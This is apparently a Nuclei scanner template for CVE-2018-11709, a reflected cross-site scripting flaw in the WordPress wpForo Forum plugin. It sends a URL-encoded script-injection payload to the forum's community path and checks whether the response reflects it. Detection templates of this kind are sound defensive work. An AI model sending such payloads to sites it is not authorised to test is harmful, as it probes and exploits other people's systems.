my-nuclei-templates/CVE-2018-11709.yaml

41 lines
1.1 KiB
YAML

id: CVE-2018-11709
info:
name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11709
- https://wordpress.org/plugins/wpforo/#developers
- https://wpvulndb.com/vulnerabilities/9090
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11709
cwe-id: CWE-79
tags: cve,cve2018,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/03/31